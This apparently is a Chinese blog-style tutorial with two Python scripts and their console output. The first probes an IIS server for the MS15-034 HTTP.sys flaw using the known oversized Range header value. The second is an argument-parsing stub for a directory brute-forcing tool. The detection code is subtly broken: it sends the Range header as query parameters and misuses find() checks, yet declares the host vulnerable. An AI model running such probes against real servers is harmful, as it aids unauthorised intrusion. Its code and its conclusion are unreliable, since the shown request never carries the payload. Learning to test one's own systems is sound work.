MS15-034测试方法连接网页
https://blog.csdn.net/Jiajiajiang_/article/details/80742955
Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034) 网站参考:
https://www.exploit-db.com/exploits/36773
一 漏洞检测工具
import requests
#捕捉漏洞检测工具
url='http://192.168.1.3/'
r=requests.get(url)
remote_request=r.headers['Server']
if remote_request.find('IIS/10.0')or remote_request.find('IIS/8.5'):
protype={'Host':'stuff','Range':'bytes = 0 - 18446744073709551615'}
r1=requests.get(url,params=protype)
print(r1.request.headers)
print(r1.content)
if str(r1.content).find('Requested Range Not Satisfiable'):
print(url+' already exits ms15-034')
else:
print(url+'not exits ms15-034')
else:
print('Server not has IIS/10.0')
控制台输出
D:\python\python.exe D:/Flask项目设计/penetration_test/apps/requests_test.py
{'User-Agent': 'python-requests/2.23.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />\r\n<title>IIS Windows</title>\r\n<style type="text/css">\r\n<!--\r\nbody {\r\n\tcolor:#000000;\r\n\tbackground-color:#0072C6;\r\n\tmargin:0;\r\n}\r\n\r\n#container {\r\n\tmargin-left:auto;\r\n\tmargin-right:auto;\r\n\ttext-align:center;\r\n\t}\r\n\r\na img {\r\n\tborder:none;\r\n}\r\n\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="container">\r\n<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>\r\n</div>\r\n</body>\r\n</html>'
http://192.168.1.3/ already exits ms15-034
二 命令行工具参数获得
pycharm编辑代码如下:
#命令行工具参数获得import getopt
import sys
def banner():
print('*'*51)
print('*'*2+' '*17+'DirBrute v1.0'+' '*17+'*'*2)
print('This tool just develop for education!')
print('*'*51)
def usage():
print("This is the tool's usage")
print('Python DirBrute -u url -t thread -d dictionary')
usage()
banner()
opts, args=getopt.getopt(sys.argv[1:],"u:t:d")
for k,vin opts:
print(k)
print(v)
print('*'*50)
print(type(opts))
print(opts)
print(type(args))
print(args)
项目文件夹结构
控制台输出命令:
***************************************************** DirBrute v1.0 **
This tool just develop for education!
***************************************************
This is the tool's usage
Python DirBrute -u url -t thread -d dictionary
<class 'list'>
[('-u', 'http://127.0.0.1'), ('-t', '5'), ('-d', '')]
<class 'list'>
['dir.txt']
(my_flask) D:\Flask项目设计\my_flask\ch1>python tencent_test.py -u http://127.0.0.1 -t 5 -d dir.t
xt
***************************************************
** DirBrute v1.0 **
This tool just develop for education!
***************************************************
This is the tool's usage
Python DirBrute -u url -t thread -d dictionary
-u
http://127.0.0.1
-t
5
-d
<class 'list'>
[('-u', 'http://127.0.0.1'), ('-t', '5'), ('-d', '')]
<class 'list'>
['dir.txt']
(my_flask) D:\Flask项目设计\my_flask\ch1>python tencent_test.py -u http://127.0.0.1 -t 5 -d dir.t
xt
***************************************************
** DirBrute v1.0 **
This tool just develop for education!
***************************************************
This is the tool's usage
Python DirBrute -u url -t thread -d dictionary
-u
http://127.0.0.1
-t
5
-d
